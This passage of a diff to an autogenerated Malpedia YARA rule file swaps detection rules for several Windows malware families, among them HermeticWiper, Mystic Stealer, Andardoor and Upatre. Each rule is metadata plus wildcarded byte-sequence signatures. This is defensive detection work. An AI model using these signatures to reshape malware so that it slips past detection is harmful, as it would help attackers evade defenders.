-		$sequence_8 = { 89c6 8b00 8b4010 3d???????? 0f8598030000 8d45d9 8d4ddc }
-		$sequence_9 = { e8???????? 89c3 893424 89d9 e8???????? 83ec04 8d45e0 }
+		$sequence_0 = { 8d1c8d804e4100 8bf0 83e61f c1e606 8b0b }
+		$sequence_1 = { 59 59 68d0070000 68???????? }
+		$sequence_2 = { 50 897d80 e8???????? 83c418 8d45c4 50 }
+		$sequence_3 = { e8???????? ff35???????? 8d851cd1ffff 50 e8???????? }
+		$sequence_4 = { 53 e8???????? 59 59 3bc6 740e 50 }
+		$sequence_5 = { e8???????? 59 59 8945e0 85c0 7461 8d0cbd804e4100 }
+		$sequence_6 = { 56 e8???????? 83c414 ebc9 8bc8 c1f905 8d1c8d804e4100 }
+		$sequence_7 = { ebd0 8bc8 c1f905 8d3c8d804e4100 }
+		$sequence_8 = { 803073 ffc1 48ffc0 3bca 7cea 803d????????4d }
+		$sequence_9 = { 83fa0a 7d15 4863ca 0fb68419b01f0200 }
+		$sequence_10 = { eb03 488bc7 488b0d???????? 4533c9 41b888130000 498bd5 }
+		$sequence_11 = { 6642391c47 75f6 4c8bce ba02000000 488bcf ffd0 }
+		$sequence_12 = { 0fb78439c0160200 6683e847 6642890401 4883c102 4881f92c030000 7ce2 }
+		$sequence_13 = { fe08 488d4001 443838 75f5 488d85f0030000 4438bdf0030000 }
+		$sequence_14 = { 668935???????? 488b742438 66893d???????? 488b7c2440 668905???????? }
+		$sequence_15 = { 33c9 660f1f440000 420fb6843968a21700 88840dc0280000 488d4901 84c0 }
 
 	condition:
-		7 of them and filesize < 2351104
+		7 of them and filesize < 3244032
 }
-rule MALPEDIA_Win_Transbox_Auto : FILE
+rule MALPEDIA_Win_Aytoke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "974af1a4-da2b-5193-ac3c-32d4a6cfff60"
+		id = "b5ab25e2-4341-5ae9-b651-f00d8ee54d3c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.transbox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.transbox_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aytoke_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "e0417344b856e4de18adbd11a563963b1ed47459f0027440ad36de04e1848468"
+		logic_hash = "fd830f88f9db36bca6c8ff77c03edf20db894b0cd51609c00e9abcdd21defeac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101078,32 +101152,32 @@ rule MALPEDIA_Win_Transbox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bda 8bf1 ff15???????? 898520fbffff 85f6 741a }
-		$sequence_1 = { 33c9 83c414 85c0 0f9fc1 8bc1 8b4dfc 33cd }
-		$sequence_2 = { 898738010000 85c0 745d 8d856cffffff 50 53 }
-		$sequence_3 = { 8bbdb0fdffff 8bc7 8bb5acfdffff 2bc6 99 f7f9 85c0 }
-		$sequence_4 = { 8b35???????? 85c0 740c 6a04 56 50 }
-		$sequence_5 = { 50 8d8db8fdffff e8???????? 50 8d8d7cfdffff e8???????? }
-		$sequence_6 = { 888178c60110 41 84c0 75f1 }
-		$sequence_7 = { e8???????? 57 8d95d0fdffff 8d8db8fdffff e8???????? c645fc0a c70424???????? }
-		$sequence_8 = { 83c430 8d4dd0 e8???????? 33ff be???????? 47 8bce }
-		$sequence_9 = { 740c 6a04 56 50 e8???????? 83c40c 8325????????00 }
+		$sequence_0 = { 75e9 e9???????? 33c0 8bff 0fb78874374100 66898c05fcfdffff }
+		$sequence_1 = { 83feff 751a ff15???????? 50 68???????? e8???????? }
+		$sequence_2 = { 83c204 83c404 3bd6 7c1b 90 }
+		$sequence_3 = { e9???????? 33c0 8bff 0fb788343a4100 66898c05fcfdffff 83c002 }
+		$sequence_4 = { 8d0cbd00c44100 8901 8305????????20 8b11 }
+		$sequence_5 = { c1e106 030c9d00c44100 eb02 8bca f641247f 7525 }
+		$sequence_6 = { be???????? 8d7de0 f3a5 50 }
+		$sequence_7 = { b32a 3bc8 7c0e 389850744100 7501 42 40 }
+		$sequence_8 = { e8???????? 0fb60d???????? 51 8d55d4 52 68???????? 8d85f8f9ffff }
+		$sequence_9 = { 46 eb18 b801000000 3bc8 7c0f 3b1485989c4100 7501 }
 
 	condition:
-		7 of them and filesize < 288768
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
+rule MALPEDIA_Win_Hermeticwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8696fe6d-5c5e-50d1-8126-e510e7272553"
+		id = "8b44d155-0791-5e5b-b54e-af128b883341"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.innaput_rat_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermeticwiper_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "9fc4a0f22b0936282c888c32e9151fce9421447e6433604a7df7c0949331d6ed"
+		logic_hash = "17096a8aa2a5af71cd29251b2c3f7e9bb82649586a87a38d8e44cf9b2d8d68bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101117,32 +101191,32 @@ rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc3 751b 53 53 53 6a06 }
-		$sequence_1 = { ffd7 8b4510 898618060000 8b4514 8b00 89861c060000 }
-		$sequence_2 = { 740f 8b4d08 e8???????? 3b450c 72d9 eb02 }
-		$sequence_3 = { 50 56 ff15???????? 89be14040000 }
-		$sequence_4 = { 8b4d08 e8???????? 3b450c 72d9 }
-		$sequence_5 = { ff5704 59 8b0e 894104 8b06 }
-		$sequence_6 = { 53 53 53 6a06 6a01 6a02 ff15???????? }
-		$sequence_7 = { 8d8608020000 50 ffd7 8b4510 898618060000 }
-		$sequence_8 = { 85c0 7413 3bc6 740f 8b4d08 e8???????? 3b450c }
-		$sequence_9 = { 391e 75fa 6a0c ff5704 59 8906 3bc3 }
+		$sequence_0 = { e8???????? 83c414 85db 7410 53 6a00 }
+		$sequence_1 = { 8bcb e8???????? 8b4c2410 83c404 8b442410 894f0c }
+		$sequence_2 = { 53 56 57 f60010 c745f8???????? c745fc???????? }
+		$sequence_3 = { 8bf2 8bc3 0facc605 8975cc c1e805 8945e4 83e107 }
+		$sequence_4 = { 85f6 0f84ee030000 56 ff35???????? }
+		$sequence_5 = { 8b4e10 8b7e08 03cf 8b560c 8b4614 13c2 89542418 }
+		$sequence_6 = { 8d8578fcffff 50 ff15???????? 8d8578fcffff 50 ff15???????? 8d8578fcffff }
+		$sequence_7 = { 897004 8b451c 895e0c c7460800000000 85c0 7506 8b4518 }
+		$sequence_8 = { 8bf7 8955f8 894dfc 03f1 }
+		$sequence_9 = { 8b542418 837b3400 7406 895340 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Backbend_Auto : FILE
+rule MALPEDIA_Win_Unidentified_071_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a22a893e-f0d0-5f47-b17e-12aba9db7e5e"
+		id = "518d209c-e627-5ef3-9eb6-1a7ee7d67ffa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.backbend_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_071"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_071_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "917ffc9b273790f466925eaea42d05e106cbb5d93ffca6efcba917e5ff6beb38"
+		logic_hash = "10aa474e67246e989615e8f1a539e8beccbe5f2115f19e32be1e24db8d548303"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101156,32 +101230,32 @@ rule MALPEDIA_Win_Backbend_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8500ffffff 50 ff15???????? 85c0 7416 8d8500fbffff }
-		$sequence_1 = { 6800020000 50 e8???????? 8d8500fbffff 53 }
-		$sequence_2 = { 81ec54020000 53 56 57 68???????? c605????????4b c605????????43 }
-		$sequence_3 = { 68e8030000 ffd6 ff7510 ffd3 }
-		$sequence_4 = { ff15???????? 80a40500ffffff00 8d8500ffffff 56 50 ff15???????? }
-		$sequence_5 = { e8???????? 8d8500f9ffff 50 e8???????? }
-		$sequence_6 = { e8???????? 68???????? 56 e8???????? 8d8500fdffff 56 50 }
-		$sequence_7 = { 56 8bf8 ff15???????? 68???????? ff7508 }
-		$sequence_8 = { e8???????? 8d8500f9ffff 56 50 e8???????? }
-		$sequence_9 = { 57 e8???????? 83c410 6860ea0000 ffd6 33c0 }
+		$sequence_0 = { 33c0 83fa2b 8bce 0f45c8 33ed 83fa30 894c2428 }
+		$sequence_1 = { 740e 8b4d0c ff31 8bc8 e8???????? 8bc8 8b4508 }
+		$sequence_2 = { a3???????? ff7518 8d45dc 50 ff7510 }
+		$sequence_3 = { c20800 e8???????? cc 8b4c2404 53 8b5c2410 55 }
+		$sequence_4 = { 53 89442418 e8???????? 8bf0 83c8ff 8d4e01 81f9ffffff7f }
+		$sequence_5 = { 8b4304 8d48ff d3e6 03f6 }
+		$sequence_6 = { 8b33 56 55 e8???????? 8d047d02000000 89742418 }
+		$sequence_7 = { 84c0 750b 83c618 57 8bce }
+		$sequence_8 = { e8???????? 8b442424 83c410 c6042b00 83f810 7234 }
+		$sequence_9 = { 2bc1 894c2404 3bc2 0f82a9000000 8b4314 55 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 1220608
 }
-rule MALPEDIA_Win_Rad_Auto : FILE
+rule MALPEDIA_Win_Andardoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf7df94d-6d22-5657-82bf-7d35a5482def"
+		id = "81ba1768-aed9-5f8c-98e2-be1a91393599"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rad_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andardoor_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "1eec20ddabb813a5b7c10180af0c0f122f744f026c6b5d60bcc21414af7a0dac"
+		logic_hash = "f5bb44cfeb5e0f7e950fe93babcfa1fb8b5f0313142a54c4e5fa92021682222b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101195,32 +101269,32 @@ rule MALPEDIA_Win_Rad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8d8520feffff 50 e8???????? c3 8d85c0fcffff 50 }
-		$sequence_1 = { 68???????? 8d4df8 68???????? 51 ffd7 83c410 }
-		$sequence_2 = { 8db514faffff e9???????? 8db5f8f9ffff e9???????? 8d8d88faffff ff25???????? 8db5dcf9ffff }
-		$sequence_3 = { ff15???????? 8bc6 8b8c24e0000000 64890d00000000 59 5e 5b }
-		$sequence_4 = { c684240001000002 85f6 7439 8d8c24d4000000 }
-		$sequence_5 = { 7556 8bce 897508 ff15???????? 8d55f0 52 8bce }
-		$sequence_6 = { 51 8d8d34ffffff ff15???????? 8d8d10ffffff c645fc03 ff15???????? 8b35???????? }
-		$sequence_7 = { 84c0 0f84c5000000 b8???????? 8dbc24e0000000 e8???????? 8bcf 51 }
-		$sequence_8 = { c684240c06000022 ff15???????? 8b4c241c 50 81c1c4030000 c684240c06000023 ff15???????? }
-		$sequence_9 = { 8b8d00ffffff 8b5104 8d8550ffffff 898510fdffff c7841500ffffffa4e64000 8d8504ffffff }
+		$sequence_0 = { 48895c2430 895c2428 c744242001000000 c745bc01010000 }
+		$sequence_1 = { 3bc3 7d15 4863d3 41b842000000 488bcf ff15???????? }
+		$sequence_2 = { e8???????? 84c0 7414 85ff 7e10 448bc7 }
+		$sequence_3 = { 48ffc3 48ffc1 8803 84c0 75f2 33ff 807d8000 }
+		$sequence_4 = { 7505 4032ff eb1f 85db }
+		$sequence_5 = { 41b880000000 e8???????? 4533c9 4c8d442430 }
+		$sequence_6 = { 448935???????? b932000000 ff15???????? 4439742440 0f86f5000000 }
+		$sequence_7 = { 41be01000000 4889bc2410040000 4585f7 0f84c6010000 }
+		$sequence_8 = { 6685c0 75e7 33d2 488d8d50040000 41b880000000 e8???????? }
+		$sequence_9 = { 4883c002 4883f80a 75d6 e8???????? 488b4b08 4885c9 7405 }
 
 	condition:
-		7 of them and filesize < 207872
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Yoddos_Auto : FILE
+rule MALPEDIA_Win_Zitmo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "773dcd86-3687-5c26-8a61-390a3a45554b"
+		id = "d2638537-3a4e-5c8e-ade0-4e7713d00050"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yoddos_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zitmo_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "8286010b7da9f1df882192411526cd0a211d255dea4daeff1ec9797cedceaf98"
+		logic_hash = "0686a29e962228ecc50738c63dd8a09a1caddb201f651468d74323cba829436b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101234,32 +101308,32 @@ rule MALPEDIA_Win_Yoddos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 90 b89dffffff 90 c685d0fdffff4b }
-		$sequence_1 = { ff15???????? ff35???????? ff15???????? 6880000000 53 68???????? c705????????01000000 }
-		$sequence_2 = { 90 b89dffffff 90 be04010000 8d858cfeffff 33db 56 }
-		$sequence_3 = { 33db 56 50 53 c645f043 c645f14f c645f24d }
-		$sequence_4 = { c6459863 c645996b c6459a2e c6459b63 }
-		$sequence_5 = { c9 c20400 55 8bec 81ec480d0000 53 56 }
-		$sequence_6 = { 889d27feffff c6853cfeffff77 c6853dfeffff77 c6853efeffff77 c6853ffeffff2e c68540feffff68 c68541feffff61 }
-		$sequence_7 = { 8d85e0fdffff 50 e8???????? 50 8d85c8fcffff 50 }
-		$sequence_8 = { c645d34c c645d46f c645d563 c645d661 c645d76c }
-		$sequence_9 = { e8???????? 83c410 8d85d4fbffff 53 50 }
+		$sequence_0 = { 55 8bec 81c47cffffff ff4de4 46 c9 }
+		$sequence_1 = { e8???????? f7d3 4f e8???????? 8bca }
+		$sequence_2 = { 6a33 56 6831373600 6a35 68632403db e8???????? 40 }
+		$sequence_3 = { 23c7 f7d3 f7da 48 23ca }
+		$sequence_4 = { f7db 4e 03fa 23f0 03c3 2175f4 }
+		$sequence_5 = { 8bda 43 f7d3 8bf2 }
+		$sequence_6 = { 0945f8 ffb5dcfeffff e8???????? c9 c20800 }
+		$sequence_7 = { 8bcf 23c3 8d8dc8feffff 51 }
+		$sequence_8 = { c9 c20400 55 8bec 81c420ffffff ff8d6cffffff 8365dc34 }
+		$sequence_9 = { e8???????? c9 c20800 55 8bec 81c478ffffff ff4dc0 }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Webc2_Head_Auto : FILE
+rule MALPEDIA_Win_Royal_Dns_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b0489fed-bd6b-5cdc-bfab-bd5427505aa6"
+		id = "5169d1d0-659d-5d51-8aba-541d3872a32b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_head"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_head_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royal_dns_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0f0d261fc67cb4837b13f2fc98dacb6b1c0e0f0d77dda88fbe5b4ef793a0acb0"
+		logic_hash = "4810e30179da8cf300ac6b9d2a5829b8b65ed7f8312156b3af4aea162299d11c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101273,32 +101347,32 @@ rule MALPEDIA_Win_Webc2_Head_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e61f 8d3c8d40cb4000 c1e603 8b0f 833c31ff 7536 833d????????01 }
-		$sequence_1 = { e8???????? 83c410 8d4c2418 8d942444080000 03f0 }
-		$sequence_2 = { 894c2424 896c241c 7e1a 8b742420 8bd1 8d7c241c }
-		$sequence_3 = { 8d8decfaffff 668b11 f6c201 7416 8088????????10 8a9405ecfdffff 8890e0b84000 }
-		$sequence_4 = { d04040 00fc 40 40 0020 }
-		$sequence_5 = { 6800040000 68???????? f3ab 55 c744242c00000000 }
-		$sequence_6 = { 89542420 33d2 895c2410 bb???????? 85c0 0f8e20010000 b910000000 }
-		$sequence_7 = { 2bca 33ed 85c9 894c2424 896c241c 7e1a }
-		$sequence_8 = { 8b7d0c 8d0594b84000 83780800 7543 }
-		$sequence_9 = { 6a1f 55 ff15???????? 8b3d???????? 6a04 81cf00330000 }
+		$sequence_0 = { e8???????? 83c404 83bd80f1ffff05 7c12 8b8d7cf1ffff 51 ff15???????? }
+		$sequence_1 = { 83c004 8985e8faffff 3bc1 0f8725010000 }
+		$sequence_2 = { ffd6 68???????? 8d95f0fdffff 52 ffd6 57 8d85f0fdffff }
+		$sequence_3 = { 75f9 8b4dfc 2bc2 8d540801 8b45f8 8910 }
+		$sequence_4 = { 0f84ad010000 83f8ff 0f84a4010000 85c0 0f849c010000 }
+		$sequence_5 = { 56 8d85e8fdffff 68???????? 50 e8???????? 83c40c 8d8df0feffff }
+		$sequence_6 = { 8d95d8fcffff 6a00 52 e8???????? 0fb6730c }
+		$sequence_7 = { 53 6a00 6800040000 8d85f4fbffff c785dcfaffff10000000 }
+		$sequence_8 = { 8b4608 52 83c00c 50 83c711 57 e8???????? }
+		$sequence_9 = { be50000000 56 51 8d95d9feffff 52 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
+rule MALPEDIA_Win_Upatre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2aee59e1-5390-5b6c-ba5d-d62a358c2fe1"
+		id = "73539601-8658-55a3-ad49-65acd97f978e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mystic_stealer_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.upatre_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "5074dde9add0d24e82d880c50882d8de92cc1c57bceb2be1475c662a7640d829"
+		logic_hash = "8c959d494139a03c01baced655928fcf1bda3e51a3d094a6d0ce455b32426f5d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101312,32 +101386,38 @@ rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8986bc160000 8bc1 668986b8160000 e9???????? 0fb786c40a0000 }
-		$sequence_1 = { 8b5608 668986b8160000 88040a ff4614 }
-		$sequence_2 = { 0f82ab000000 8bcf c1e903 0fb603 83ef08 33c6 c1ee08 }
-		$sequence_3 = { 8bd0 896c2418 6bcaec 8bc5 89442410 }
-		$sequence_4 = { 8d5e28 7409 ff7008 ff33 ff17 }
-		$sequence_5 = { 3bc6 0f46f0 8b4738 56 03c1 }
-		$sequence_6 = { 896c2418 6bcaec 8bc5 89442410 03f9 8bcd 83ea01 }
-		$sequence_7 = { 8b87a0160000 89542418 881401 ff87a0160000 8b97a0160000 }
-		$sequence_8 = { 6648 89742410 0fb7d0 8b87a0160000 }
-		$sequence_9 = { 8b4f6c 8b472c 2bce 2d06010000 }
+		$sequence_0 = { 7404 66ab ebf5 8b7594 }
+		$sequence_1 = { 33c0 ac 8945a4 897da0 }
+		$sequence_2 = { 3c01 740c b053 66ab b045 }
+		$sequence_3 = { 66ad 8945ac 33c0 8bc8 }
+		$sequence_4 = { b02f 66ab ff7590 33c0 b404 57 03f8 }
+		$sequence_5 = { 50 6880000000 6a02 50 6a02 6800000040 ff75f0 }
+		$sequence_6 = { ff75f0 ff55f8 50 ebe7 56 ff55fc }
+		$sequence_7 = { b02f 66ab 8b45a8 ff5504 33c9 8ac8 ff5508 }
+		$sequence_8 = { 8b4dfc 51 e8???????? 83c408 8945d8 }
+		$sequence_9 = { 0f84fa000000 8b55f8 52 8b45d8 }
+		$sequence_10 = { 8b4dc4 51 e8???????? 8b55d0 52 e8???????? e9???????? }
+		$sequence_11 = { 0dc21748db 60 23e7 1b800fa46451 }
+		$sequence_12 = { 753b 6a01 8d4dcf 51 8b55fc }
+		$sequence_13 = { 51 e8???????? 83c40c eb2b 8b55f4 8b420c 50 }
+		$sequence_14 = { 05c8000000 3bc8 7c22 0fb74df8 }
+		$sequence_15 = { eb58 8b4df4 8b510c 52 e8???????? 83c404 0fb7c0 }
 
 	condition:
-		7 of them and filesize < 512000
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Sidewinder_Auto : FILE
+rule MALPEDIA_Win_Balkan_Door_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "392688fd-d092-5405-9184-eda077762341"
+		id = "870a99c0-e95d-56d4-9ce7-fd5381768dbe"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidewinder_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.balkan_door_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "ed076ae71f5673b9d5b7573a79292b3a5ca9ffc23926551c4a3dd71dd3fac1f3"
+		logic_hash = "1cfcbe46433533ae63497a1399949fc7dd10f1e5a4dc1daebcdead984fa82911"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101351,32 +101431,32 @@ rule MALPEDIA_Win_Sidewinder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 50 e8???????? 8bd0 8d4de8 e8???????? 8d45c8 }
-		$sequence_1 = { 8d4dc4 e8???????? 8d45ac 89458c 8d458c 50 }
-		$sequence_2 = { 8d4dcc e8???????? 8d45dc 898570ffffff c78568ffffff08400000 8d8568ffffff 50 }
-		$sequence_3 = { 8965ec c745f0182c4000 c745f400000000 c745f800000000 6a01 e8???????? 8d45dc }
-		$sequence_4 = { ff75bc 8b45cc 8b00 ff75cc ff5060 dbe2 8945b4 }
-		$sequence_5 = { ff5004 8b4508 8b403c 0b450c 8b4d08 89413c 8b4508 }
-		$sequence_6 = { 0f8053010000 668945ec 668b45ec 663b45d8 0f8f22010000 668365e400 }
-		$sequence_7 = { 0f84df000000 66830d????????ff 8d45dc 50 8b45e8 8b00 ff75e8 }
-		$sequence_8 = { e8???????? 898530ffffff eb07 83a530ffffff00 6a00 8b8568ffffff 83e801 }
-		$sequence_9 = { e8???????? 68???????? 8d4ddc e8???????? 8d4dd8 e8???????? c3 }
+		$sequence_0 = { 56 ffd7 5e 32c0 5f c3 32c0 }
+		$sequence_1 = { c785ccfdffff00000000 50 56 c785d0fdffff2c020000 ff15???????? }
+		$sequence_2 = { ff15???????? 8bf8 89bd3cefffff 85ff }
+		$sequence_3 = { 8be5 5d c3 8d85d0fdffff c785ccfdffff00000000 50 56 }
+		$sequence_4 = { 85f6 740b 6a00 6a00 56 ff15???????? 57 }
+		$sequence_5 = { 6a01 6a02 6a10 6a04 68???????? }
+		$sequence_6 = { 6a00 56 ff15???????? 57 8b3d???????? ffd7 85f6 }
+		$sequence_7 = { c3 8d85d0fdffff c785ccfdffff00000000 50 56 }
+		$sequence_8 = { ffd7 6a00 ff35???????? ffd3 85c0 }
+		$sequence_9 = { 52 50 ff15???????? 8bf8 89bd3cefffff 85ff }
 
 	condition:
-		7 of them and filesize < 679936
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Dnschanger_Auto : FILE
+rule MALPEDIA_Win_Auriga_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "375505d5-891d-554a-a42f-9e6f0fae0b87"
+		id = "b04a7a23-d5dd-51a9-9bcd-b8623a771f3d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnschanger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnschanger_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.auriga_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "f68b87e486e08337bbca4e5fa0e18e836c7279b07c38cbb25db798c12b62c8c3"
+		logic_hash = "ba5e317ff80a4f54d11462b8caf5c19d9418687fbcd32874c6803873b6103354"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -101390,32 +101470,32 @@ rule MALPEDIA_Win_Dnschanger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7411 8b4500 68???????? 50 e8???????? 83c408 8b4d00 }
-		$sequence_1 = { 8b35???????? ffd6 57 ffd6 5f 32c0 5e }
-		$sequence_2 = { 6a08 ff15???????? 50 ff15???????? 8b6c241c 8b74240c }
-		$sequence_3 = { 8844240f e8???????? 8b442414 83c40c 89442400 }
-		$sequence_4 = { 756b 8b44240c 83f804 7705 be06000000 }
-		$sequence_5 = { c3 8a44242c 84c0 742d }
-		$sequence_6 = { 6a00 6a03 ff75fc ffd7 }
-		$sequence_7 = { 83c408 84c0 7406 b801000000 }
-		$sequence_8 = { eb4e 57 33c0 8d7df8 895df4 }
-		$sequence_9 = { ff15???????? 8d542408 52 e8???????? 85c0 5f 5e }
+		$sequence_0 = { 68???????? 56 e8???????? 57 8d85f0f9ffff 50 }
+		$sequence_1 = { 8b35???????? ffd6 8945f4 8b45d4 83c002 }
+		$sequence_2 = { 7410 6681f96c68 7409 0fb74802 ff3488 }
+		$sequence_3 = { 40 40 663bcf 75ea }
+		$sequence_4 = { ff15???????? 85c0 7c1e a1???????? }
+		$sequence_5 = { 7518 ffb5f8fbffff 8b35???????? ffd6 ffb5f4fbffff ffd6 33c0 }
+		$sequence_6 = { 8b0d???????? 03c1 3900 74f0 8b15???????? 56 }
+		$sequence_7 = { 8b5a1c 03dd 8b048b 03c5 8944241c 61 }
+		$sequence_8 = { 0f8ce7010000 8d85e8f9ffff 50 8d85e0f9ffff }
+		$sequence_9 = { 33c0 8945e4 8945f0 8945f4 8d45e0 }
 
 	condition:
